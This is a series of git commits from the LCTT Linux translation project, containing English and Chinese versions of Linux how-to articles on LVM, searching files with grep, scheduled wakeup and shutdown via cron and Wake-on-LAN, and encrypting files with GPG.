LVM。如果你能那样做,我很高兴;因为,自从我使用它之后,我的硬盘管理任务变得如此的简单。 + + +### 关于作者 + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] + + David Both - 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。... [more about David Both][7][More about me][8] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/business/16/9/linux-users-guide-lvm + +作者:[David Both](a) +译者:[qhwdw](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/business/16/9/linux-users-guide-lvm?rate=79vf1js7A7rlp-I96YFneopUQqsa2SuB-g-og7eiF1U +[7]:https://opensource.com/users/dboth +[8]:https://opensource.com/users/dboth +[9]:https://opensource.com/user/14106/feed +[10]:https://opensource.com/users/dboth +[11]:https://opensource.com/users/dboth +[12]:https://opensource.com/users/dboth +[13]:https://opensource.com/business/16/9/linux-users-guide-lvm#comments +[14]:https://opensource.com/tags/business +[15]:https://opensource.com/tags/linux +[16]:https://opensource.com/tags/how-tos-and-tutorials +[17]:https://opensource.com/tags/sysadmin From 24aba7f38f3373d86c8250297298716e05c9ef39 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 5 Dec 2017 17:12:48 +0800 Subject: [PATCH 0305/1627] Translated by qhwdw --- ...20160922 A Linux users guide to Logical Volume Management.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20160922 A Linux users guide to Logical Volume Management.md b/translated/tech/20160922 A Linux users guide to Logical Volume Management.md index 18b42e9e69..c43a8777e1 100644 --- a/translated/tech/20160922 A Linux users guide to Logical Volume Management.md +++ b/translated/tech/20160922 A Linux users guide to Logical Volume Management.md @@ -142,7 +142,7 @@ e2label /dev/MyVG01/Stuff Stuff via: https://opensource.com/business/16/9/linux-users-guide-lvm 作者:[David Both](a) -译者:[qhwdw](https://github.com/译者ID) +译者:[qhwdw](https://github.com/qhwdw) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 5eba6f6260c4fa3a6f856198e97136e819b45e4d Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 18:31:06 +0800 Subject: [PATCH 0306/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20find?= =?UTF-8?q?=20all=20files=20with=20a=20specific=20text=20using=20Linux=20s?= =?UTF-8?q?hell?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...with a specific text using Linux shell .md | 294 ++++++++++++++++++ 1 file changed, 294 insertions(+) create mode 100644 sources/tech/20171130 How to find all files with a specific text using Linux shell .md diff --git a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md new file mode 100644 index 0000000000..f5909c27c9 --- /dev/null +++ b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md @@ -0,0 +1,294 @@ +translating by lujun9972 +How to find all files with a specific text using Linux shell +------ +### Objective + +The following article provides some useful tips on how to find all files within any specific directory or entire file-system containing any specific word or string. + +### Difficulty + +EASY + +### Conventions + +* # - requires given command to be executed with root privileges either directly as a root user or by use of sudo command + +* $ - given command to be executed as a regular non-privileged user + +### Examples + +### Find all files with a specific string non-recursively + +The first command example will search for a string + +`stretch` + +in all files within + +`/etc/` + +directory while excluding any sub-directories: + +``` +# grep -s stretch /etc/* +/etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" +/etc/os-release:VERSION="9 (stretch)" +``` +`-s` + +grep option will suppress error messages about nonexistent or unreadable files. The output shows filenames as well as prints the actual line containing requested string. + +### Find all files with a specific string recursively + +The above command omitted all sub-directories. To search recursively means to also traverse all sub-directories. The following command will search for a string + +`stretch` + +in all files within + +`/etc/` + +directory including all sub-directories: + +``` +# grep -R stretch /etc/* +/etc/apt/sources.list:# deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main +/etc/apt/sources.list:#deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main +/etc/apt/sources.list:deb http://ftp.au.debian.org/debian/ stretch main +/etc/apt/sources.list:deb-src http://ftp.au.debian.org/debian/ stretch main +/etc/apt/sources.list:deb http://security.debian.org/debian-security stretch/updates main +/etc/apt/sources.list:deb-src http://security.debian.org/debian-security stretch/updates main +/etc/dictionaries-common/words:backstretch +/etc/dictionaries-common/words:backstretch's +/etc/dictionaries-common/words:backstretches +/etc/dictionaries-common/words:homestretch +/etc/dictionaries-common/words:homestretch's +/etc/dictionaries-common/words:homestretches +/etc/dictionaries-common/words:outstretch +/etc/dictionaries-common/words:outstretched +/etc/dictionaries-common/words:outstretches +/etc/dictionaries-common/words:outstretching +/etc/dictionaries-common/words:stretch +/etc/dictionaries-common/words:stretch's +/etc/dictionaries-common/words:stretched +/etc/dictionaries-common/words:stretcher +/etc/dictionaries-common/words:stretcher's +/etc/dictionaries-common/words:stretchers +/etc/dictionaries-common/words:stretches +/etc/dictionaries-common/words:stretchier +/etc/dictionaries-common/words:stretchiest +/etc/dictionaries-common/words:stretching +/etc/dictionaries-common/words:stretchy +/etc/grub.d/00_header:background_image -m stretch `make_system_path_relative_to_its_root "$GRUB_BACKGROUND"` +/etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" +/etc/os-release:VERSION="9 (stretch)" +``` + +The above + +`grep` + +command example lists all files containing string + +`stretch` + +. Meaning the lines with + +`stretches` + +, + +`stretched` + +etc. are also shown. Use grep's + +`-w` + +option to show only a specific word: + +``` +# grep -Rw stretch /etc/* +/etc/apt/sources.list:# deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main +/etc/apt/sources.list:#deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main +/etc/apt/sources.list:deb http://ftp.au.debian.org/debian/ stretch main +/etc/apt/sources.list:deb-src http://ftp.au.debian.org/debian/ stretch main +/etc/apt/sources.list:deb http://security.debian.org/debian-security stretch/updates main +/etc/apt/sources.list:deb-src http://security.debian.org/debian-security stretch/updates main +/etc/dictionaries-common/words:stretch +/etc/dictionaries-common/words:stretch's +/etc/grub.d/00_header:background_image -m stretch `make_system_path_relative_to_its_root "$GRUB_BACKGROUND"` +/etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" +/etc/os-release:VERSION="9 (stretch)" +``` + +The above commands may produce an unnecessary output. The next example will only show all file names containing string + +`stretch` + +within + +`/etc/` + +directory recursively: + +``` +# grep -Rl stretch /etc/* +/etc/apt/sources.list +/etc/dictionaries-common/words +/etc/grub.d/00_header +/etc/os-release +``` + +All searches are by default case sensitive which means that any search for a string + +`stretch` + +will only show files containing the exact uppercase and lowercase match. By using grep's + +`-i` + +option the command will also list any lines containing + +`Stretch` + +, + +`STRETCH` + +, + +`StReTcH` + +etc., hence, to perform case-insensitive search. + +``` +# grep -Ril stretch /etc/* +/etc/apt/sources.list +/etc/dictionaries-common/default.hash +/etc/dictionaries-common/words +/etc/grub.d/00_header +/etc/os-release +``` + +Using + +`grep` + +command it is also possible to include only specific files as part of the search. For example we only would like to search for a specific text/string within configuration files with extension + +`.conf` + +. The next example will find all files with extension + +`.conf` + +within + +`/etc` + +directory containing string + +`bash` + +: + +``` +# grep -Ril bash /etc/*.conf +OR +# grep -Ril --include=\*.conf bash /etc/* +/etc/adduser.conf +``` +`--exclude` + +option we can exclude any specific filenames: + +``` +# grep -Ril --exclude=\*.conf bash /etc/* +/etc/alternatives/view +/etc/alternatives/vim +/etc/alternatives/vi +/etc/alternatives/vimdiff +/etc/alternatives/rvim +/etc/alternatives/ex +/etc/alternatives/rview +/etc/bash.bashrc +/etc/bash_completion.d/grub +/etc/cron.daily/apt-compat +/etc/cron.daily/exim4-base +/etc/dictionaries-common/default.hash +/etc/dictionaries-common/words +/etc/inputrc +/etc/passwd +/etc/passwd- +/etc/profile +/etc/shells +/etc/skel/.profile +/etc/skel/.bashrc +/etc/skel/.bash_logout +``` + +Same as with files grep can also exclude specific directories from the search. Use + +`--exclude-dir` + +option to exclude directory from search. The following search example will find all files containing string + +`stretch` + +within + +`/etc` + +directory and exclude + +`/etc/grub.d` + +from search: + +``` +# grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/* +/etc/apt/sources.list +/etc/dictionaries-common/words +/etc/os-release +``` + +By using + +`-n` + +option grep will also provide an information regarding a line number where the specific string was found: + +``` +# grep -Rni bash /etc/*.conf +/etc/adduser.conf:6:DSHELL=/bin/bash +``` + +The last example will use + +`-v` + +option to list all files NOT containing a specific keyword. For example the following search will list all files within + +`/etc/` + +directory which do not contain string + +`stretch` + +: + +``` +# grep -Rlv stretch /etc/* +``` + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-find-all-files-with-a-specific-text-using-linux-shell + +作者:[Lubos Rendek][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org From eec7eafcdddc0416053e6547a5e2ea0576b9d8d4 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 5 Dec 2017 19:18:45 +0800 Subject: [PATCH 0307/1627] Translating by qhwdw --- ...005 How to manage Linux containers with Ansible Container.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md index 897b793a86..0f200d73a8 100644 --- a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md +++ b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -1,4 +1,4 @@ -How to manage Linux containers with Ansible Container +Translating by qhwdw How to manage Linux containers with Ansible Container ============================================================ ### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. From 57252987000dc1f3968a790330119a1afc0182a9 Mon Sep 17 00:00:00 2001 From: TRsky <625310581@qq.com> Date: Tue, 5 Dec 2017 20:02:08 +0800 Subject: [PATCH 0308/1627] translate the passage --- ...ke up and Shut Down Linux Automatically.md | 75 ++++++++++--------- 1 file changed, 38 insertions(+), 37 deletions(-) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index 3a2c20ad52..5ed3f2bf10 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -1,26 +1,24 @@ - translating by HardworkFish - -Wake up and Shut Down Linux Automatically -============================================================ +自动唤醒和关闭 Linux +===================== ### [banner.jpg][1] -![time keeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) - -Learn how to configure your Linux computers to watch the time for you, then wake up and shut down automatically. +![timekeeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) +了解如何通过配置 Linux 计算机来查看时间,并实现自动唤醒和关闭 Linux + [Creative Commons Attribution][6][The Observatory at Delhi][7] -Don't be a watt-waster. If your computers don't need to be on then shut them down. For convenience and nerd creds, you can configure your Linux computers to wake up and shut down automatically. +不要成为一个电能浪费者。如果你的电脑不需要开机就请把他们关机。出于方便和计算机宅的考虑,你可以通过配置你的 Linux 计算机实现自动唤醒和关闭 Linux 。 -### Precious Uptimes +### 系统运行时间 -Some computers need to be on all the time, which is fine as long as it's not about satisfying an uptime compulsion. Some people are very proud of their lengthy uptimes, and now that we have kernel hot-patching that leaves only hardware failures requiring shutdowns. I think it's better to be practical. Save electricity as well as wear on your moving parts, and shut them down when they're not needed. For example, you can wake up a backup server at a scheduled time, run your backups, and then shut it down until it's time for the next backup. Or, you can configure your Internet gateway to be on only at certain times. Anything that doesn't need to be on all the time can be configured to turn on, do a job, and then shut down. +有时候有些电脑需要一直处在开机状态,在不超过电脑运行时间的限制下这种情况是被允许的。有些人为他们的计算机可以长时间的正常运行而感到自豪,且现在我们有内核热补丁能够实现只有在硬件发生故障时才允许机器关机。我认为比较实际可行的是能够在机器需要节省电能以及在移动硬件发生磨损的情况下,且在不需要机器运行的情况下将其关机。比如,你可以在规定的时间内唤醒备份服务器,执行备份,然后关闭它直到下一次进行备份时间。或者,你可以只在特定时间内配置网卡。任何不需要一直运行的东西都可以将其配置成在其需要工作的时候打开,待其完成工作后将其关闭。 -### Sleepies +### 系统休眠 -For computers that don't need to be on all the time, good old cron will shut them down reliably. Use either root's cron, or /etc/crontab. This example creates a root cron job to shut down every night at 11:15 p.m. +对于不需要一直运行的电脑,使用 root 的 cron 定时任务 或者 /etc/crontab 文件 可以可靠地关闭电脑。这个例子创建一个 root 定时任务实现每天下午 11点15分 定时关机。 ``` # crontab -e -u root @@ -32,33 +30,34 @@ For computers that don't need to be on all the time, good old cron will shut the 15 23 * * 1-5 /sbin/shutdown -h now ``` -You may also use /etc/crontab, which is fast and easy, and everything is in one file. You have to specify the user: +一个快速、容易的方式是,使用 /etc/crontab 文件。你必须指定用户: ``` 15 23 * * 1-5 root shutdown -h now ``` -Auto-wakeups are very cool; most of my SUSE colleagues are in Nuremberg, so I am crawling out of bed at 5 a.m. to have a few hours of overlap with their schedules. My work computer turns itself on at 5:30 a.m., and then all I have to do is drag my coffee and myself to my desk to start work. It might not seem like pressing a power button is a big deal, but at that time of day every little thing looms large. +实现自动唤醒是一件很酷的事情;我的大多数 SUSE (SUSE Linux)同事都在纽伦堡,因此,为了能够跟同事的计划有几小时的重叠时间我需要在凌晨5点起床。我的计算机早上 5点半自动开始工作,而我只需要将自己和咖啡拖到我的桌子上就可以开始工作了。按下电源按钮看起来好像并不是什么大事,但是在每天的那个时候每件小事都会变得很大。 -Waking up your Linux PC can be less reliable than shutting it down, so you may want to try different methods. You can use wakeonlan, RTC wakeups, or your PC's BIOS to set scheduled wakeups. These all work because, when you power off your computer, it's not really all the way off; it is in an extremely low-power state and can receive and respond to signals. You need to use the power supply switch to turn it off completely. +唤醒 Linux 计算机可能不比关闭它可靠,因此你可能需要尝试不同的办法。你可以使用 远程唤醒(Wake-On-LAN)、RTC 唤醒或者个人电脑的 BIOS 设置预定的唤醒。做这些工作的原因是,当你关闭电脑时,这并不是真正关闭了计算机;此时计算机处在极低功耗状态且还可以接受和响应信号。你需要使用电源开关将其彻底关闭。 -### BIOS Wakeup +### BIOS 唤醒 -A BIOS wakeup is the most reliable. My system BIOS has an easy-to-use wakeup scheduler (Figure 1). Chances are yours does, too. Easy peasy. +BIOS 唤醒是最可靠的。我的系统主板 BIOS 有一个易于使用的唤醒调度程序。(Figure 1). Chances are yours does, too. Easy peasy. ### [fig-1.png][2] -![wake up](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) +![wakeup](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) Figure 1: My system BIOS has an easy-to-use wakeup scheduler. [Used with permission][8] -### wakeonlan -wakeonlan is the next most reliable method. This requires sending a signal from a second computer to the computer you want to power on. You could use an Arduino or Raspberry Pi to send the wakeup signal, a Linux-based router, or any Linux PC. First, look in your system BIOS to see if wakeonlan is supported -- which it should be -- and then enable it, as it should be disabled by default. +### 主机远程唤醒(Wake-On-LAN) -Then, you'll need an Ethernet network adapter that supports wakeonlan; wireless adapters won't work. You'll need to verify that your Ethernet card supports wakeonlan: +远程唤醒是仅次于 BIOS 唤醒的又一种可靠的唤醒方法。这需要你从第二台计算机发送信号到所要打开的计算机。可以使用 Arduino 或 树莓派(Raspberry Pi) 发送基于 Linux 的路由器或者任何Linux 计算机的唤醒信号。首先,查看系统主板 BIOS 是否支持 Wake-On-LAN –如果支持—然后启动它,因为它被默认为禁用。 + +然后,需要一个支持 Wake-On-LAN 的网卡;无线网卡并不支持。你需要运行 ethtool 命令查看网卡是否支持 Wake-On-LAN : ``` # ethtool eth0 | grep -i wake-on @@ -66,23 +65,23 @@ Then, you'll need an Ethernet network adapter that supports wakeonlan; wireless Wake-on: g ``` -* d -- all wake ups disabled +* d -- 禁用 -* p -- wake up on physical activity +* p -- 物理活动唤醒 -* u -- wake up on unicast messages +* u -- 单播消息唤醒 -* m -- wake up on multicast messages +* m -- 多播(组播)消息唤醒 -* b -- wake up on broadcast messages +* b -- 广播消息唤醒 -* a -- wake up on ARP messages +* a -- ARP(Address Resolution Protocol)唤醒 -* g -- wake up on magic packet +* g -- magic packet 唤醒 -* s -- set the Secure On password for the magic packet +* s -- magic packet 设置安全密码 -man ethtool is not clear on what the p switch does; it suggests that any signal will cause a wake up. In my testing, however, it doesn't do that. The one that must be enabled is g -- wake up on magic packet, and the Wake-on line shows that it is already enabled. If it is not enabled, you can use ethtool to enable it, using your own device name, of course: +man ethtool 并不清楚开关 p 的作用;这表明任何信号都会导致唤醒。在我的测试中,然而,它并没有这么做。Wake-On-Lan 被启动的 Wake-on 参数是 g –- magic packet 唤醒,且当 Wake-On 值已经为 g 时表示网卡已支持 Wake-On-Lan 。如果它没有被启用,你可以通过 ethtool 命令来启用它。 ``` # ethtool -s eth0 wol g @@ -100,26 +99,26 @@ Figure 2: Enable Wake on LAN. [Used with permission][9] -Another option is recent Network Manager versions have a nice little checkbox to enable wakeonlan (Figure 2). +另外一个选择是最近的网络管理器版本有一个很好的小复选框能够唤醒局域网(图2)。 -There is a field for setting a password, but if your network interface doesn't support the Secure On password, it won't work. +这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持 Secure On password,它就不起作用。 -Now you need to configure a second PC to send the wakeup signal. You don't need root privileges, so create a cron job for your user. You need the MAC address of the network interface on the machine you're waking up: +现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要正在唤醒的机器上的网络接口和MAC地址。 ``` 30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B ``` -Using the real-time clock for wakeups is the least reliable method. Check out [Wake Up Linux With an RTC Alarm Clock][4]; this is a bit outdated as most distros use systemd now. Come back next week to learn more about updated ways to use RTC wakeups. +通过使用实时闹钟来唤醒计算机是最不可靠的方法。查看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。下周继续了解更多关于使用RTC唤醒的方法。 -Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX. +通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [ Linux 入门][5]教程。 -------------------------------------------------------------------------------- -via: https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically +via:https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically 作者:[Carla Schroder] -译者:[译者ID](https://github.com/译者ID) +译者:[译者ID](https://github.com/HardworkFish) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -133,3 +132,5 @@ via: https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux [7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html [8]:https://www.linux.com/licenses/category/used-permission [9]:https://www.linux.com/licenses/category/used-permission + + From 2fa592a2cb1e9994ed40a207cde287b8efb19657 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Tue, 5 Dec 2017 20:04:00 +0800 Subject: [PATCH 0309/1627] Update 20171120 Mark McIntyre How Do You Fedora.md --- sources/tech/20171120 Mark McIntyre How Do You Fedora.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md index bfd19e1eda..40af7eba2f 100644 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -1,5 +1,6 @@ translating by zrszrszrs # [Mark McIntyre: How Do You Fedora?][1] +# [Mark McIntyre: 你是如何使用Fedora的?][1] ![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) From 76fbbbde563baf68ff3f74227b524684bdcd7eda Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 20:18:00 +0800 Subject: [PATCH 0310/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Encr?= =?UTF-8?q?ypt=20and=20Decrypt=20Individual=20Files=20With=20GPG?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...t and Decrypt Individual Files With GPG.md | 145 ++++++++++++++++++ 1 file changed, 145 insertions(+) create mode 100644 sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md diff --git a/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md b/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md new file mode 100644 index 0000000000..eea4b569bf --- /dev/null +++ b/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md @@ -0,0 +1,145 @@ +translating by lujun9972 +How to Encrypt and Decrypt Individual Files With GPG +------ +### Objective + +Encrypt individual files with GPG. + +### Distributions + +This will work with any Linux distribution. + +### Requirements + +A working Linux install with GPG installed or root privileges to install it. + +### Difficulty + +Easy + +### Conventions + +* # - requires given command to be executed with root privileges either directly as a root user or by use of sudo command + +* $ - given command to be executed as a regular non-privileged user + +### Introduction + +Encryption is important. It's absolutely vital to protecting sensitive information. Your personal files are worth encrypting, and GPG provides the perfect solution. + +### Install GPG + +GPG is a widely used piece of software. You can find it in nearly every distribution's repositories. If you don't have it already, install it on your computer. + +### Debian/Ubuntu + +``` +$ sudo apt install gnupg +``` + +``` +# dnf install gnupg2 +``` + +``` +# pacman -S gnupg +``` + +``` +# emerge --ask app-crypt/gnupg +``` + +You need a key pair to be able to encrypt and decrypt files. If you already have a key pair that you generated for SSH, you can actually use those here. If not, GPG includes a utility to generate them. + +``` +$ gpg --full-generate-key +``` + +The first thing GPG will ask for is the type of key. Use the default, if there isn't anything specific that you need. + +The next thing that you'll need to set is the key size. + +`4096` + +is probably best. + +After that, you can set an expiration date. Set it to + +`0` + +if you want the key to be permanent. + +Then, it will ask you for your name. + +Finally, it asks for your email address. + +You can add a comment if you need to too. + +When it has everything, GPG will ask you to verify the information. + +GPG will ask if you want a password for your key. This is optional, but adds a degree of protection. As it's doing that, GPG will collect entropy from your actions to increase the strength of your key. When it's done, GPG will print out the information pertaining to the key you just created. + +### Basic Encryption + +Now that you have your key, encrypting files is very easy. Create a blank text file in your + +`/tmp` + +directory to practice with. + +``` +$ touch /tmp/test.txt +``` +`-e` + +flag tells GPG that you'll be encrypting a file, and the + +`-r` + +flag specifies a recipient. + +``` +$ gpg -e -r "Your Name" /tmp/test.txt +``` + +### Basic Decryption + +You have an encrypted file. Try decrypting it. You don't need to specify any keys. That information is encoded with the file. GPG will try the keys that it has to decrypt it. + +``` +$ gpg -d /tmp/test.txt.gpg +``` + +Say you + + _do_ + +need to send the file. You need to have the recipient's public key. How you get that from them is up to you. You can ask them to send it to you, or it may be publicly available on a keyserver. + +Once you have it, import the key into GPG. + +``` +$ gpg --import yourfriends.key +``` + +``` +gpg --export -a "Your Name" > your.key +``` + +``` +$ gpg -e -u "Your Name" -r "Their Name" /tmp/test.txt +``` + +That's mostly it. There are some more advanced options available, but you won't need them ninety-nine percent of the time. GPG is that easy to use. You can also use the key pair that you created to send and receive encrypted email in much the same way as this, though most email clients automate the process once they have the keys. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-encrypt-and-decrypt-individual-files-with-gpg + +作者:[Nick Congleton][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org From 21a2999ba0fc513fbc3d344f5d22979960f07c6e Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 5 Dec 2017 21:41:32 +0800 Subject: [PATCH 0311/1627] translated --- ...t and Decrypt Individual Files With GPG.md | 132 ++++++++---------- 1 file changed, 62 insertions(+), 70 deletions(-) diff --git a/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md b/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md index eea4b569bf..d28e36e358 100644 --- a/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md +++ b/sources/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md @@ -1,136 +1,128 @@ -translating by lujun9972 -How to Encrypt and Decrypt Individual Files With GPG +如何使用 GPG 加解密文件 ------ -### Objective +### 目标 -Encrypt individual files with GPG. +使用 GPG 加密文件 -### Distributions +### 发行版 -This will work with any Linux distribution. +适用于任何发行版 -### Requirements +### 要求 -A working Linux install with GPG installed or root privileges to install it. +安装了 GPG 的Linux 或者拥有 root 权限来安装它. -### Difficulty +### 难度 -Easy +简单 -### Conventions +### 约定 -* # - requires given command to be executed with root privileges either directly as a root user or by use of sudo command +* # - 需要使用root权限来执行指定命令,可以直接使用root用户来执行也可以使用sudo命令 -* $ - given command to be executed as a regular non-privileged user +* $ - 可以使用普通用户来执行指定命令 -### Introduction +### 介绍 -Encryption is important. It's absolutely vital to protecting sensitive information. Your personal files are worth encrypting, and GPG provides the perfect solution. +加密非常重要. 它对于保护敏感信息来说是必不可少的. +你的私人文件应该要被加密, 而 GPG 提供了很好的解决方案. -### Install GPG +### 安装 GPG -GPG is a widely used piece of software. You can find it in nearly every distribution's repositories. If you don't have it already, install it on your computer. +GPG 的使用非常广泛. 你在几乎每个发行版的仓库中都能找到它. +如果你还没有安装它,那现在就来安装一下吧. -### Debian/Ubuntu +#### Debian/Ubuntu -``` +```shell $ sudo apt install gnupg ``` - -``` +#### Fedora +```shell # dnf install gnupg2 ``` - -``` +#### Arch +```shell # pacman -S gnupg ``` - -``` +#### Gentoo +```shell # emerge --ask app-crypt/gnupg ``` +### Create a Key +你需要一个密钥对来加解密文件. 如果你为 SSH 已经生成过了密钥对,那么你可以直接使用它. +如果没有,GPG包含工具来生成密钥对. -You need a key pair to be able to encrypt and decrypt files. If you already have a key pair that you generated for SSH, you can actually use those here. If not, GPG includes a utility to generate them. - -``` +```shell $ gpg --full-generate-key ``` +GPG 有一个命令行程序帮你一步一步的生成密钥. 它还有一个简单得多的工具,但是这个工具不能让你设置密钥类型,密钥的长度以及过期时间,因此不推荐使用这个工具. -The first thing GPG will ask for is the type of key. Use the default, if there isn't anything specific that you need. +GPG 首先会询问你密钥的类型. 没什么特别的话选择默认值就好. -The next thing that you'll need to set is the key size. +下一步需要设置密钥长度. `4096` 是一个不错的选择. -`4096` +之后, 可以设置过期的日期. 如果希望密钥永不过期则设置为 `0` -is probably best. +然后,输入你的名称. -After that, you can set an expiration date. Set it to +最后, 输入电子邮件地址. -`0` +如果你需要的话,还能添加一个注释. -if you want the key to be permanent. +所有这些都完成后, GPG 会让你校验一下这些信息. -Then, it will ask you for your name. +GPG 还会问你是否需要为密钥设置密码. 这一步是可选的, 但是会增加保护的程度. +若需要设置密码,则 GPG 会收集你的操作信息来增加密钥的健壮性. 所有这些都完成后, GPG 会显示密钥相关的信息. -Finally, it asks for your email address. +### 加密的基本方法 -You can add a comment if you need to too. +现在你拥有了自己的密钥, 加密文件非常简单. 使用虾米那命令在 `/tmp` 目录中创建一个空白文本文件. -When it has everything, GPG will ask you to verify the information. - -GPG will ask if you want a password for your key. This is optional, but adds a degree of protection. As it's doing that, GPG will collect entropy from your actions to increase the strength of your key. When it's done, GPG will print out the information pertaining to the key you just created. - -### Basic Encryption - -Now that you have your key, encrypting files is very easy. Create a blank text file in your - -`/tmp` - -directory to practice with. - -``` +```shell $ touch /tmp/test.txt ``` -`-e` -flag tells GPG that you'll be encrypting a file, and the +然后用 GPG 来加密它. 这里 `-e` 标志告诉 GPG 你想要加密文件, `-r` 标志指定接收者. -`-r` - -flag specifies a recipient. - -``` +```shell $ gpg -e -r "Your Name" /tmp/test.txt ``` -### Basic Decryption +GPG 